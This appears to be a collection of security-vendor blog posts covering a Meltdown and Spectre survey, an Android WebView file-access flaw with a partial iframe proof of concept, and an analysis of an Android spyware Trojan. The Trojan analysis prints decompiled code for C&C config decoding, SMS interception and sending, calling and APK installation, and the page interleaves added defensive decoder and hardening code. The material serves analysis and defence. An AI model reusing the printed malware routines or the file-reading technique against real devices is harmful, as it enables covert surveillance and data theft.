74% of Consumers are Concerned About Meltdown and Spectre

We just released data that shows a large percentage of consumers are concerned about Meltdown and Spectre, two vulnerabilities that could permit attackers to gain unauthorized access to a computer’s memory. According to a January 2018 survey sent to 8000 of our users, 74 percent are either “Extremely Concerned” or “Somewhat Concerned” about the threats.

Meltdown and Spectre are flaws that affect nearly all modern processors, including chips from Intel, AMD, and those with ARM-based architectures, and can only be mitigated through operating system patches. Of the two, Meltdown poses the greater threat because it is easier to exploit and affects all kinds of computers, including personal computers and virtual machines in the cloud.

Our CEO had this response to the data:

“It is actually a really good sign that consumers are paying such close attention to these issues,” said Allan Zhang, CEO and co-founder of Trustlook. “Too often the public is criticized for not being diligent enough with their device security. So, the silver lining with Meltdown and Spectre is that it’s forced everyone to focus greater attention on security.”

Trustlook’s study revealed the following attitudes about Meltdown and Spectre:

▪ 38% Extremely Concerned
▪ 36% Somewhat Concerned
▪ 14% Not Very Concerned
▪ 12% Absolutely No Concern

For more information on Meltdown and Spectre, please visit https://meltdownattack.com.

Android WebView Class Poses Significant Security Risk

Tencent Security Labs recently reported a vulnerability that exists across some common apps. The report can be found at http://www.cnvd.org.cn/webinfo/show/4365. The issue, which has been around since 2014, has to do with the misconfiguration or misuse of the WebView class.

The Android WebView class is used to display HTML pages such as the UI or online content. WebView uses the WebKit rendering engine, which is included in many web browsers. The engine allows the user to navigate forward and backward, zoom in and out on a web page, and process JavaScript in the HTML document.

The following is an example of using WebView:

WebView webView = findViewById(R.id.webView);
WebSettings webSettings = webView.getSettings();

JavaScript is disabled in WebView by default, though the app can enable it with setJavaScriptEnabled. WebView settings also provide methods that control access to other content, such as:

  • setAllowFileAccess

Enables or disables file access in WebView. Note that the assets and resources are still accessible even if file access is disabled.

  • setAllowFileAccessFromFileURLs

Enables or disables JavaScript running in a file scheme URL from accessing content from other file scheme URLs. This setting is overridden by setAllowUniversalAccessFromFileURLs when that is enabled.

  • setAllowUniversalAccessFromFileURLs

Enables or disables JavaScript running in a file scheme URL from accessing content from any other origin.

Web browsers enforce a “same-origin policy,” which restricts JavaScript on a page from accessing data that belongs to a different origin. The browser decides whether two URIs share an origin by comparing their protocol, host and port.

A brief sample of URIs compared with the URL http://www.example.com/index.html under the same-origin policy is shown below:

URL                                     Same-origin?   Reason
http://www.example.com/index2.html      yes            same protocol, host and port
https://www.example.com/index.html      no             protocol is different
http://example.com/index.html           no             host is different
http://www.example.com:88/index.html    no             port is different
file:///data/local/tmp/index.html       no             protocol and host are different

WebView implements the same-origin policy: JavaScript loaded over the HTTP scheme can’t access file scheme URLs. Normally, Android apps run in separate processes, so App A is not able to access the private data of App B, and vice versa. However, if setAllowFileAccess and setAllowUniversalAccessFromFileURLs are both enabled, App A can launch an exported activity of App B and pass it a malicious file scheme URL; the WebView in App B then loads that page with access to App B’s private files.

App B contains a WebView that loads a URL received as the parameter “url”:

WebView webView = findViewById(R.id.webView);
webView.loadUrl(url);

Suppose App A passes the file scheme URL “file:///data/local/tmp/index.html” as the “url” parameter to webView.loadUrl(url) in App B, and the index.html file has the following content:

<script>
function readfile() {
    // body omitted in the report
}
</script>
<iframe id='iframe' src="file:///data/data/com.test.webv/abc.txt" onload='readfile()'></iframe>

In this way App A reads App B’s private file “/data/data/com.test.webv/abc.txt”. In the above sample, the attacker must already be able to drop the malicious HTML document onto the user’s device.

Workarounds for this potential WebView vulnerability include:

  • Disable file scheme URLs in the app if file access is not needed, by calling setAllowFileAccess(false). Files in the assets and res folders are not affected by this setting, so fixed HTML can still be placed there.
  • Validate file scheme URLs to eliminate directory traversal attacks.
  • If the app doesn’t use JavaScript in a WebView, call setJavaScriptEnabled(false).
  • If the activity does not need to be exported, set android:exported="false" on its Activity tag in the manifest. Otherwise, validate the parameters passed to the WebView.
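As an added example (written for this note, not code from the Tencent report or from Trustlook), the weak configuration beside the hardened one: the activity applies the workarounds above and loads a caller-supplied URL only after a scheme check. The layout name, the “url” Intent extra and the blocked.html asset are assumptions; R.id.webView is the id used in the snippet above.

```java
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;

public class ViewerActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_viewer);                 // assumed layout
        WebView webView = (WebView) findViewById(R.id.webView);  // id from the snippet above
        WebSettings settings = webView.getSettings();

        // Weak configuration described in the report: a file:// page loaded into this
        // WebView can read the app's private files and hand them to any origin.
        //   settings.setJavaScriptEnabled(true);
        //   settings.setAllowFileAccess(true);
        //   settings.setAllowUniversalAccessFromFileURLs(true);

        // Hardened configuration: JavaScript stays off unless the app needs it, and the
        // file scheme is closed. Pages bundled under assets/ and res/ remain reachable
        // through file:///android_asset/ and file:///android_res/.
        settings.setJavaScriptEnabled(false);
        settings.setAllowFileAccess(false);
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);

        // When the activity must stay exported, the caller-supplied URL is checked first.
        String requested = getIntent().getStringExtra("url");   // assumed extra name
        if (isAllowedExternalUrl(requested)) {
            webView.loadUrl(requested);
        } else {
            webView.loadUrl("file:///android_asset/blocked.html");   // assumed bundled page
        }
    }

    /** Accepts absolute http(s) URLs only; file://, content://, javascript: and relative input are rejected. */
    static boolean isAllowedExternalUrl(String url) {
        if (url == null) return false;
        Uri uri = Uri.parse(url);
        String scheme = uri.getScheme();
        if (scheme == null || uri.getHost() == null) {
            return false;
        }
        return scheme.equalsIgnoreCase("https") || scheme.equalsIgnoreCase("http");
    }
}
```

The last workaround still applies alongside this: set android:exported="false" on the activity whenever other apps never need to start it.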

Qualcomm Chips Less Impacted by Meltdown and Spectre

Last week it was widely reported that two severe vulnerabilities were found in Intel chips, either of which could permit attackers to gain unauthorized access to a computer’s memory. The first vulnerability, Meltdown (CVE-2017-5754), can effectively remove the barrier between user applications and sensitive parts of the operating system. The second vulnerability, Spectre (CVE-2017-5753 and CVE-2017-5715), can trick vulnerable applications into leaking their memory contents. Of the two, Meltdown poses the greater threat because it is easier to exploit and affects all kinds of computers, including personal computers and virtual machines in the cloud.

Meltdown and Spectre affect nearly all modern processors, including chips from Intel, AMD, and those with ARM-based architectures such as Qualcomm’s, and can only be mitigated through operating system patches. The good news is that chips on mobile devices, of which Qualcomm is the leader, may have less exposure to risk than chips on PCs or virtual machines.

Qualcomm President Cristiano Amon has been quoted as saying that the recent Meltdown and Spectre security flaws are not concerns for the company and the mobile industry. According to TechCrunch, which reported the Qualcomm President’s quotes, Amon said, “There are a few things that are unique about the mobile ecosystem. Users download from an app store. On top of that, the impact you had on Android and ARM — we had patches that got released as early as December to some OEMs.” The report also adds that according to the Qualcomm President, “this is not an area of concern for us and the mobile ecosystem.” Moreover, Google said in a blog post that all Android devices with the latest security update are protected.

This affirmation by Qualcomm was a collective sigh of relief for many smartphone users. It is also important to Trustlook, as we work closely with Qualcomm to power advanced security solutions. Our software solutions, called SECUREai MP App and SECUREai MP Token, work in concert with the Qualcomm HavenTM Security Platform on Snapdragon chips, giving them unprecedented, built-in security features. This level of security is made possible by designing the security into the chip, and cannot be matched by software-based solutions.

Regardless of how unlikely it is for Qualcomm-powered smartphones to be impacted by Meltdown or Spectre, it is important to install the latest security updates as soon as they’re available. It won’t take long for bad actors to start exploiting these vulnerabilities, as much of the sample code has already been released to the public.


Trojan Utilizes Customized Communication Packets to Target Korean Speaking Users

Trustlook Labs has discovered a Trojan that targets Korean-speaking mobile users. The Trojan collects user data, including contacts, call logs, and SMS history. It also records audio, takes pictures, makes phone calls, and sends SMS messages.

The Trojan disguises itself as a system app named “System Service,” and demands device administrator rights. This prevents it from being removed. The malware also removes its icon from the launcher menu to further mask itself.

The package can be identified as having the following characteristics:

  • MD5: b737d915ca36edbb24cb844ebfb621d9
  • SHA256: 734fb5812af358bc4d5a5d70e7c3c0321b9b16f8832d24b096393474bc9c3f8b
  • Size: 525055 bytes
  • App name: System Service
  • Package name: com.google.service

The package icon is:


Upon execution, the app persuades the user to enable Device Administrator Access in order to maintain its persistence on the system:


The message on the screen is in Korean. Translated into English it says: “Encrypted data transfer, your personal information can be protected.” The app targets Korean speaking users, and more specifically, mobile users in South Korea. Once the user clicks “Activate,” the app removes its icon from the launcher to hide itself. If the user attempts to disable the Device Administrator, the app will keep popping up the above window to force the user to re-enable it.

The app stores its C&C server address and port in a file named “config.db” in the assets folder. The stored content appears as follows: LCXwKS@0KS@sMSLeLCf2MA73MSDuLSL<

The app uses the following code snippets to decode the string:

    public boolean readConfig() {
        boolean result = false;
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(getAssets().open("config.db")));
            try {
                int i;
                StringBuilder sb = new StringBuilder();
                while (true) {
                    String line = br.readLine();
                    if (line == null) {
                        break;
                    }
                    sb.append(line);
                }
                // Stage 1: add 1 to every character of the stored string
                String config = sb.toString();
                byte[] buf = config.getBytes();
                byte[] buf1 = new byte[buf.length];
                for (i = 0; i < buf.length; i++) {
                    buf1[i] = (byte) (buf[i] + 1);
                }
                // Stage 2: Base64-decode the shifted string
                byte[] buf2 = Base64.decode(buf1, 0);
                // Stage 3: add 1 to every decoded byte
                byte[] buf3 = new byte[buf2.length];
                for (i = 0; i < buf2.length; i++) {
                    buf3[i] = (byte) (buf2[i] + 1);
                }
                // Plaintext layout is "<host> <port> <password>"
                config = new String(buf3, "utf-8");
                String[] data = config.split(" ");
                this.host = data[0];
                this.port = Integer.parseInt(data[1]);
                this.password = data[2];
                result = true;
            } finally {
                br.close();
            }
        } catch (Exception e) {
            // any failure leaves result false
        }
        return result;
    }

The config.db data above decodes to the following string, which contains the C&C IP address, port and the password used to encrypt the data: !1985!962024
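An added standalone decoder (written for this note, not the Trojan’s code) that reproduces the three-stage transform above on the config.db string from the page and also runs it in reverse, so an analyst can confirm that the recovered host, port and password round-trip back to the stored bytes. It uses java.util.Base64 in place of android.util.Base64 so it runs on a desktop JVM.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class ConfigDbDecoder {
    // The config.db contents quoted above.
    static final String STORED = "LCXwKS@0KS@sMSLeLCf2MA73MSDuLSL<";

    /** Adds delta (mod 256) to every byte, as the malware's two for-loops do. */
    static byte[] shift(byte[] in, int delta) {
        byte[] out = new byte[in.length];
        for (int i = 0; i < in.length; i++) {
            out[i] = (byte) (in[i] + delta);
        }
        return out;
    }

    /** Stage 1: +1 per character, stage 2: Base64 decode, stage 3: +1 per byte. */
    static String decode(String stored) {
        byte[] b64 = shift(stored.getBytes(StandardCharsets.US_ASCII), 1);
        byte[] raw = Base64.getDecoder().decode(b64);
        return new String(shift(raw, 1), StandardCharsets.UTF_8);
    }

    /** Exact inverse of decode(): -1 per byte, Base64 encode, -1 per character. */
    static String encode(String plain) {
        byte[] raw = shift(plain.getBytes(StandardCharsets.UTF_8), -1);
        byte[] b64 = Base64.getEncoder().encode(raw);
        return new String(shift(b64, -1), StandardCharsets.US_ASCII);
    }

    public static void main(String[] args) {
        // Pass another sample's config.db content as the first argument, if desired.
        String stored = args.length > 0 ? args[0] : STORED;
        String plain = decode(stored);
        // Same layout the Trojan's readConfig() expects: "<host> <port> <password>"
        String[] fields = plain.split(" ");
        if (fields.length != 3) {
            throw new IllegalStateException("unexpected layout: " + plain);
        }
        System.out.println("host     = " + fields[0]);
        System.out.println("port     = " + Integer.parseInt(fields[1]));
        System.out.println("password = " + fields[2]);
        // Round-trip check: re-encoding must reproduce the stored bytes exactly.
        if (!encode(plain).equals(stored)) {
            throw new IllegalStateException("round-trip mismatch");
        }
    }
}
```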

The app uses customized packets to communicate with the C&C server in order to avoid network detection. It processes four packet types:

  • CommandPacket: stores a command received from the server.
  • TransportPacket: carries the data, data length, and sequence number; this is the main data exchange format between the app and the C&C server.
  • LogPacket: the app logs its actions and uses these packets to send the log file.
  • PreferencePacket: mainly used to update the configuration between the app and the C&C server.

The following code snippets are used to process the CommandPacket:

    public CommandPacket(short cmd, int targetChannel, byte[] arg) {
        this.commande = cmd;
        this.argument = arg;
        this.targetChannel = targetChannel;
    }

    // Header is read in ByteBuffer's default big-endian order: 2-byte command, 4-byte channel
    public void parse(byte[] packet) {
        ByteBuffer b = ByteBuffer.wrap(packet);
        this.commande = b.getShort();
        this.targetChannel = b.getInt();
        this.argument = new byte[b.remaining()];
        b.get(this.argument, 0, b.remaining());
    }

    public void parse(ByteBuffer b) {
        this.commande = b.getShort();
        this.targetChannel = b.getInt();
        this.argument = new byte[b.remaining()];
        b.get(this.argument, 0, b.remaining());
    }

    // Serialises command, channel and argument back to back, with no length field
    public byte[] build() {
        byte[] byteCmd = ByteBuffer.allocate(2).putShort(this.commande).array();
        byte[] byteTargChan = ByteBuffer.allocate(4).putInt(this.targetChannel).array();
        byte[] cmdToSend = new byte[((byteCmd.length + byteTargChan.length) + this.argument.length)];
        System.arraycopy(byteCmd, 0, cmdToSend, 0, byteCmd.length);
        System.arraycopy(byteTargChan, 0, cmdToSend, byteCmd.length, byteTargChan.length);
        System.arraycopy(this.argument, 0, cmdToSend, byteCmd.length + byteTargChan.length, this.argument.length);
        return cmdToSend;
    }
The following is the struct of CommandPacket:

struct CommandPacket {
    short  command;    // 2 bytes, big-endian
    int    channel;    // 4 bytes, big-endian
    byte[] argument;   // all remaining bytes, no length field
};

The app supports the following commands:

Command   Description
109       display a message window
110       monitor SMS
112       get contacts
113       get SMS messages
114       list file/directory
115       send file
116       make call
117       send SMS
119       stop SMS monitoring
121       get device information
122       open a URL in a browser
123       vibrate
124       download file
125       install an APK
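An added parser (written for this note, not the Trojan’s code) for the CommandPacket layout above: a big-endian short command, a big-endian int channel, then every remaining byte as the argument, which is what build() emits. The packet bytes in main are constructed here to illustrate; the command names come from the table above.

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.util.Map;

public class CommandPacketDump {
    // Command numbers and meanings from the table above.
    static final Map<Integer, String> COMMANDS = Map.ofEntries(
        Map.entry(109, "display a message window"), Map.entry(110, "monitor SMS"),
        Map.entry(112, "get contacts"),             Map.entry(113, "get SMS messages"),
        Map.entry(114, "list file/directory"),      Map.entry(115, "send file"),
        Map.entry(116, "make call"),                Map.entry(117, "send SMS"),
        Map.entry(119, "stop SMS monitoring"),      Map.entry(121, "get device information"),
        Map.entry(122, "open a URL in a browser"),  Map.entry(123, "vibrate"),
        Map.entry(124, "download file"),            Map.entry(125, "install an APK"));

    record Parsed(short command, int channel, byte[] argument) {}

    /** Same layout as parse() above: 2-byte command, 4-byte channel, rest is the argument. */
    static Parsed parse(byte[] packet) {
        if (packet.length < 6) {
            throw new IllegalArgumentException("packet shorter than the 6-byte header");
        }
        ByteBuffer b = ByteBuffer.wrap(packet);   // big-endian by default, as in build()
        short command = b.getShort();
        int channel = b.getInt();
        byte[] argument = new byte[b.remaining()];
        b.get(argument);
        return new Parsed(command, channel, argument);
    }

    /** One-line summary suitable for a traffic log; the argument is shown as text. */
    static String describe(Parsed p) {
        String name = COMMANDS.getOrDefault((int) p.command(), "unknown");
        String text = new String(p.argument(), StandardCharsets.UTF_8);
        return "cmd=" + p.command() + " (" + name + ") channel=" + p.channel()
             + " argument=" + p.argument().length + " bytes \"" + text + "\"";
    }

    public static void main(String[] args) {
        // Constructed sample: command 122 on channel 1 with a URL argument, laid out as build() emits it.
        byte[] url = "https://example.com/".getBytes(StandardCharsets.UTF_8);
        byte[] sample = ByteBuffer.allocate(6 + url.length).putShort((short) 122).putInt(1).put(url).array();
        System.out.println(describe(parse(sample)));
    }
}
```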

The following code snippets are used to monitor incoming SMS messages:

    public SMSMonitor(MainService service, int channel, byte[] data) {
        this.ctx = service;
        this.channel = channel;
        // Server-supplied map of phone numbers and keywords to watch for
        this.numbersAndKeywords = EncoderHelper.decodeHashMap(data);
        this.numberList = new ArrayList();
        this.keywordList = new ArrayList();
        String keyword = (String) this.numbersAndKeywords.get("keyword");
        try {
            String[] phoneArray = ((String) this.numbersAndKeywords.get("phone")).split(";");
            for (Object add : phoneArray) {
                // body omitted in the listing
            }
            String[] keywordArray = keyword.split(";");
            for (Object add2 : keywordArray) {
                // body omitted in the listing
            }
        } catch (Exception e) {
        }
        // Registers for every incoming SMS broadcast
        IntentFilter intentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
        this.ctx.registerReceiver(this.SMSreceiver, intentFilter);
    }

The malware collects device information by using the following code snippets:

public class DeviceInfo {
    int channel;
    MainService ctx;
    DeviceInformationPacket p = new DeviceInformationPacket();

    // Reads the extras of the battery status broadcast
    private void battryInfo(Intent intent) {
        int i = intent.getIntExtra("health", 0);
        int j = intent.getIntExtra("level", 0);
        int k = intent.getIntExtra("plugged", 0);
        boolean bool = intent.getExtras().getBoolean("present");
        int m = intent.getIntExtra("scale", 0);
        // remainder omitted in the listing
    }

    // Enumerates every sensor on the device (-1 is Sensor.TYPE_ALL)
    public void sensorsInfo() {
        List<Sensor> sensors = ((SensorManager) this.ctx.getSystemService("sensor")).getSensorList(-1);
        ArrayList<String> list = new ArrayList();
        for (Sensor name : sensors) {
            // body omitted in the listing
        }
    }
}

The following code snippets are used to send SMS messages:

HashMap<String, String> map = EncoderHelper.decodeHashMap(byteBuffer.array());
String number = (String) map.get(Protocol.KEY_SEND_SMS_NUMBER);
String body = (String) map.get(Protocol.KEY_SEND_SMS_BODY);
// Short bodies go out as one message; longer ones are split into a multipart SMS
if (body.getBytes().length < 167) {
    SmsManager.getDefault().sendTextMessage(number, null, body, null, null);
} else {
    SmsManager.getDefault().sendMultipartTextMessage(number, null, MessageDecoupator(body), null, null);
}

The following code snippets are responsible for making phone calls:

// The number to dial arrives as the raw packet argument
Intent intent = new Intent("android.intent.action.CALL", Uri.parse("tel:" + new String(byteBuffer.array())));

The app uses the code below to install the downloaded APK:

public class ApkInstaller {
    private MainService service;

    public ApkInstaller(MainService service, int channel) {
        this.service = service;
    }

    public void hideInstall(String apkAbsolutePath) {
        // body omitted in the listing
    }

    public void installApk(String apkPath) {
        // body omitted in the listing
    }

    // Hands the downloaded APK to the system package installer through an ACTION_VIEW intent
    public void normalInstall(String apkPath) {
        Intent intent = new Intent("android.intent.action.VIEW");
        intent.setDataAndType(Uri.fromFile(new File(apkPath)), "application/vnd.android.package-archive");
        // remainder omitted in the listing
    }
}

The Trojan uses customized communication packets to avoid network detection. It allows the attacker to take full control of the device in order to steal data, monitor usage, and perform other actions that violate a user’s privacy. Trustlook’s anti-threat platform can effectively protect users against this invasion.